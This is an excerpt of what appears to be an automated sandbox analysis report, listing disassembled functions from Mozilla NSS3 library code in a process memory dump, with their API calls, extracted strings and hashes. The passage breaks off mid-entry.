                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AC61B1B1E0011AABDB10CF55CE84AABB7B9EF94359F158538DC18A7710E731E915CBE0
                                                                                                                                                                                                                                                                                          Function 6C6F8E00 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 193memoryCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6F8E5B
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE007,00000000), ref: 6C6F8E81
                                                                                                                                                                                                                                                                                          • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C6F8EED
                                                                                                                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(?,?,6C8218D0,?), ref: 6C6F8F03
                                                                                                                                                                                                                                                                                          • PR_CallOnce.NSS3(6C852AA4,6C7512D0), ref: 6C6F8F19
                                                                                                                                                                                                                                                                                          • PL_FreeArenaPool.NSS3(?), ref: 6C6F8F2B
                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C6F8F53
                                                                                                                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C6F8F65
                                                                                                                                                                                                                                                                                          • PL_FinishArenaPool.NSS3(?), ref: 6C6F8FA1
                                                                                                                                                                                                                                                                                          • SECITEM_DupItem_Util.NSS3(?), ref: 6C6F8FFE
                                                                                                                                                                                                                                                                                          • PR_CallOnce.NSS3(6C852AA4,6C7512D0), ref: 6C6F9012
                                                                                                                                                                                                                                                                                          • PL_FreeArenaPool.NSS3(?), ref: 6C6F9024
                                                                                                                                                                                                                                                                                          • PL_FinishArenaPool.NSS3(?), ref: 6C6F902C
                                                                                                                                                                                                                                                                                          • PORT_DestroyCheapArena.NSS3(?), ref: 6C6F903E
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Arena$Pool$Util$CallErrorFinishFreeItem_Once$Alloc_CheapDecodeDestroyInitQuickmemset
                                                                                                                                                                                                                                                                                          • String ID: security
                                                                                                                                                                                                                                                                                          • API String ID: 3512696800-3315324353
                                                                                                                                                                                                                                                                                          • Opcode ID: 6405c74dc6aef6c2b77e15bc31c2efaf7c26550535c0b26fa9a926c7019b15fb
                                                                                                                                                                                                                                                                                          • Instruction ID: ea749f7f6d004b95bbb735eecc616d3730c4443922b3eff7cb220353edfbdc7c
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6405c74dc6aef6c2b77e15bc31c2efaf7c26550535c0b26fa9a926c7019b15fb
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EA516BB1508300AFE7205E19DD49FAB73E9AB8A35CF84082EF56497B50D731D90AC797
                                                                                                                                                                                                                                                                                          Function 6C724E60 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 127COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3(C_GetAttributeValue), ref: 6C724E83
                                                                                                                                                                                                                                                                                          • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C724EB8
                                                                                                                                                                                                                                                                                          • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C724EC7
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C80D930: PL_strncpyz.NSS3(?,?,?), ref: 6C80D963
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3(?,00000000), ref: 6C724EDD
                                                                                                                                                                                                                                                                                          • PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6C724F0B
                                                                                                                                                                                                                                                                                          • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C724F1A
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3(?,00000000), ref: 6C724F30
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3( pTemplate = 0x%p,?), ref: 6C724F4F
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3( ulCount = %d,?), ref: 6C724F68
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Print$L_strncpyz$L_strcatn
                                                                                                                                                                                                                                                                                          • String ID: hObject = 0x%x$ hSession = 0x%x$ pTemplate = 0x%p$ ulCount = %d$ (CK_INVALID_HANDLE)$C_GetAttributeValue
                                                                                                                                                                                                                                                                                          • API String ID: 1003633598-3530272145
                                                                                                                                                                                                                                                                                          • Opcode ID: 1be880ac41300151392432d5e285c4d9316f003a875ef5730c73b9d76b37039e
                                                                                                                                                                                                                                                                                          • Instruction ID: 41dad548318187ebb4f47c0c045b0a173f0324476fc46a6908830b52fbf910ff
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1be880ac41300151392432d5e285c4d9316f003a875ef5730c73b9d76b37039e
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0D41E271A01144AFDB209F54DE4CF9B7BB5AB8231DF484435E80857B12DB3CAD48DBA1
                                                                                                                                                                                                                                                                                          Function 6C724CD0 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 120COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3(C_GetObjectSize), ref: 6C724CF3
                                                                                                                                                                                                                                                                                          • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C724D28
                                                                                                                                                                                                                                                                                          • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C724D37
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C80D930: PL_strncpyz.NSS3(?,?,?), ref: 6C80D963
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3(?,00000000), ref: 6C724D4D
                                                                                                                                                                                                                                                                                          • PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6C724D7B
                                                                                                                                                                                                                                                                                          • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C724D8A
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3(?,00000000), ref: 6C724DA0
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3( pulSize = 0x%p,?), ref: 6C724DBC
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3( *pulSize = 0x%x,?), ref: 6C724E20
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Print$L_strncpyz$L_strcatn
                                                                                                                                                                                                                                                                                          • String ID: *pulSize = 0x%x$ hObject = 0x%x$ hSession = 0x%x$ pulSize = 0x%p$ (CK_INVALID_HANDLE)$C_GetObjectSize
                                                                                                                                                                                                                                                                                          • API String ID: 1003633598-3553622718
                                                                                                                                                                                                                                                                                          • Opcode ID: d444816ad288477556e68bf6ec0c594da67bdff1dd8d04ce7d1cf1517cfd7efa
                                                                                                                                                                                                                                                                                          • Instruction ID: 90cac783b6f192ec6627f8905cf75bbc0153eed24efac45d02d0182acae6ede0
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d444816ad288477556e68bf6ec0c594da67bdff1dd8d04ce7d1cf1517cfd7efa
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E041C371641104AFDB609F14DF8DF6A37B5AB4230DF844835E908ABB12DB7CA848EBD1
                                                                                                                                                                                                                                                                                          Function 6C727C90 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 110COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3(C_Verify), ref: 6C727CB6
                                                                                                                                                                                                                                                                                          • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C727CE4
                                                                                                                                                                                                                                                                                          • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C727CF3
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C80D930: PL_strncpyz.NSS3(?,?,?), ref: 6C80D963
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3(?,00000000), ref: 6C727D09
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6C727D2A
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6C727D45
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3( pSignature = 0x%p,?), ref: 6C727D5E
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3( ulSignatureLen = %d,?), ref: 6C727D77
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Print$L_strncpyz$L_strcatn
                                                                                                                                                                                                                                                                                          • String ID: hSession = 0x%x$ pData = 0x%p$ pSignature = 0x%p$ ulDataLen = %d$ ulSignatureLen = %d$ (CK_INVALID_HANDLE)$C_Verify
                                                                                                                                                                                                                                                                                          • API String ID: 1003633598-3278097884
                                                                                                                                                                                                                                                                                          • Opcode ID: a284e4bccb0494189d17fbf76046521786bafed41e38c090405ad3704fc8ae91
                                                                                                                                                                                                                                                                                          • Instruction ID: d30517b0b2491b5a639d979ae0b75410f8a05f41224ea5d635ebabd44eff61ce
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a284e4bccb0494189d17fbf76046521786bafed41e38c090405ad3704fc8ae91
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7031B375601145AFDB609F64DF4DEAA77F1AB4231DF884435E80857B12DB38A848CBE1
                                                                                                                                                                                                                                                                                          Function 6C722F00 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 110COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3(C_SetPIN), ref: 6C722F26
                                                                                                                                                                                                                                                                                          • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C722F54
                                                                                                                                                                                                                                                                                          • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C722F63
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C80D930: PL_strncpyz.NSS3(?,?,?), ref: 6C80D963
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3(?,00000000), ref: 6C722F79
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3( pOldPin = 0x%p,?), ref: 6C722F9A
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3( ulOldLen = %d,?), ref: 6C722FB5
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3( pNewPin = 0x%p,?), ref: 6C722FCE
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3( ulNewLen = %d,?), ref: 6C722FE7
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Print$L_strncpyz$L_strcatn
                                                                                                                                                                                                                                                                                          • String ID: hSession = 0x%x$ pNewPin = 0x%p$ pOldPin = 0x%p$ ulNewLen = %d$ ulOldLen = %d$ (CK_INVALID_HANDLE)$C_SetPIN
                                                                                                                                                                                                                                                                                          • API String ID: 1003633598-3716813897
                                                                                                                                                                                                                                                                                          • Opcode ID: 187c877de1a99f28c85970bb1965e742df17bc67f7af02f70b86fbbbe22bfdb2
                                                                                                                                                                                                                                                                                          • Instruction ID: 3405c3f5994a6a1aac979d44a14fb45db1a9f1dad6256b3993e34e08f2a5c400
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 187c877de1a99f28c85970bb1965e742df17bc67f7af02f70b86fbbbe22bfdb2
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B731CE75A01144ABCB709F54DE4CE5A77B2AB4631DF884435E808A7B12DB3CE848DBE1
                                                                                                                                                                                                                                                                                          Function 6C7BCD70 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 76COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C7BCC7B), ref: 6C7BCD7A
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7BCE60: PR_LoadLibraryWithFlags.NSS3(?,?,?,?,00000000,?,6C72C1A8,?), ref: 6C7BCE92
                                                                                                                                                                                                                                                                                          • PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C7BCDA5
                                                                                                                                                                                                                                                                                          • PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C7BCDB8
                                                                                                                                                                                                                                                                                          • PR_UnloadLibrary.NSS3(00000000), ref: 6C7BCDDB
                                                                                                                                                                                                                                                                                          • PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C7BCD8E
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E05C0: PR_EnterMonitor.NSS3 ref: 6C6E05D1
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E05C0: PR_ExitMonitor.NSS3 ref: 6C6E05EA
                                                                                                                                                                                                                                                                                          • PR_LoadLibrary.NSS3(wship6.dll), ref: 6C7BCDE8
                                                                                                                                                                                                                                                                                          • PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C7BCDFF
                                                                                                                                                                                                                                                                                          • PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C7BCE16
                                                                                                                                                                                                                                                                                          • PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C7BCE29
                                                                                                                                                                                                                                                                                          • PR_UnloadLibrary.NSS3(00000000), ref: 6C7BCE48
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: FindSymbol$Library$Load$MonitorUnload$EnterExitFlagsWith
                                                                                                                                                                                                                                                                                          • String ID: freeaddrinfo$getaddrinfo$getnameinfo$ws2_32.dll$wship6.dll
                                                                                                                                                                                                                                                                                          • API String ID: 601260978-871931242
                                                                                                                                                                                                                                                                                          • Opcode ID: 0e10e67afa5e07c98787152e763b7fb6a0b304225e784c18ea08590befe5afbb
                                                                                                                                                                                                                                                                                          • Instruction ID: 4ce5ebbacfa2459e8c01ebe62cb57653f6d17911929d6b4bec548a25441277f6
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0e10e67afa5e07c98787152e763b7fb6a0b304225e784c18ea08590befe5afbb
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9611E095E0312156DF116E752E055AB399C9B0314EF544935E809F6F41FF38C948D3EA
                                                                                                                                                                                                                                                                                          Function 6C801C60 Relevance: 25.6, APIs: 17, Instructions: 114COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • calloc.MOZGLUE(00000001,00000040,?,?,?,?,?,6C8013BC,?,?,?,6C801193), ref: 6C801C6B
                                                                                                                                                                                                                                                                                          • PR_NewLock.NSS3(?,6C801193), ref: 6C801C7E
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B98D0: calloc.MOZGLUE(00000001,00000084,6C6E0936,00000001,?,6C6E102C), ref: 6C7B98E5
                                                                                                                                                                                                                                                                                          • PR_NewCondVar.NSS3(00000000,?,6C801193), ref: 6C801C91
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6DBB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6C6E21BC), ref: 6C6DBB8C
                                                                                                                                                                                                                                                                                          • PR_NewCondVar.NSS3(00000000,?,?,6C801193), ref: 6C801CA7
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6DBB80: PR_SetError.NSS3(FFFFE890,00000000), ref: 6C6DBBEB
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6DBB80: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6C6DBBFB
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6DBB80: GetLastError.KERNEL32 ref: 6C6DBC03
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6DBB80: PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6C6DBC19
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6DBB80: free.MOZGLUE(00000000), ref: 6C6DBC22
                                                                                                                                                                                                                                                                                          • PR_NewCondVar.NSS3(00000000,?,?,?,6C801193), ref: 6C801CBE
                                                                                                                                                                                                                                                                                          • PR_NewCondVar.NSS3(00000000,?,?,?,?,6C801193), ref: 6C801CD4
                                                                                                                                                                                                                                                                                          • calloc.MOZGLUE(00000001,000000F4,?,?,?,?,?,6C801193), ref: 6C801CFE
                                                                                                                                                                                                                                                                                          • PR_Lock.NSS3(?,?,?,?,?,?,?,6C801193), ref: 6C801D1A
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B9BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6C6E1A48), ref: 6C7B9BB3
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B9BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6C6E1A48), ref: 6C7B9BC8
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,6C801193), ref: 6C801D3D
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C79DD70: TlsGetValue.KERNEL32 ref: 6C79DD8C
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C79DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C79DDB4
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE890,00000000,?,6C801193), ref: 6C801D4E
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE890,00000000,?,?,?,?,?,?,?,6C801193), ref: 6C801D64
                                                                                                                                                                                                                                                                                          • PR_DestroyCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,6C801193), ref: 6C801D6F
                                                                                                                                                                                                                                                                                          • PR_DestroyCondVar.NSS3(00000000,?,?,?,?,?,6C801193), ref: 6C801D7B
                                                                                                                                                                                                                                                                                          • PR_DestroyCondVar.NSS3(?,?,?,?,?,6C801193), ref: 6C801D87
                                                                                                                                                                                                                                                                                          • PR_DestroyCondVar.NSS3(00000000,?,?,?,6C801193), ref: 6C801D93
                                                                                                                                                                                                                                                                                          • PR_DestroyLock.NSS3(00000000,?,?,6C801193), ref: 6C801D9F
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000,?,6C801193), ref: 6C801DA8
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Cond$DestroyError$calloc$CriticalLockSection$Valuefree$CountEnterInitializeLastLeaveSpinUnlock
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3246495057-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 92c5cb64114aa49c3a7296e868632c14c8c3da5c00286991708c0e1884bbfd0c
                                                                                                                                                                                                                                                                                          • Instruction ID: 424db5d15f34448ecb4873ef3b09208097fcf9a613d646f42b01dad1bec7a029
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 92c5cb64114aa49c3a7296e868632c14c8c3da5c00286991708c0e1884bbfd0c
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A43105F5E013019BEB309F25AD45A6776F8AF1661DF044839E84A87B41FB31E408CBE6
                                                                                                                                                                                                                                                                                          Function 6C715E60 Relevance: 24.8, APIs: 11, Strings: 3, Instructions: 348COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C715ECF
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C715EE3
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C715F0A
                                                                                                                                                                                                                                                                                          • PK11_MakeIDFromPubKey.NSS3(00000014), ref: 6C715FB5
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
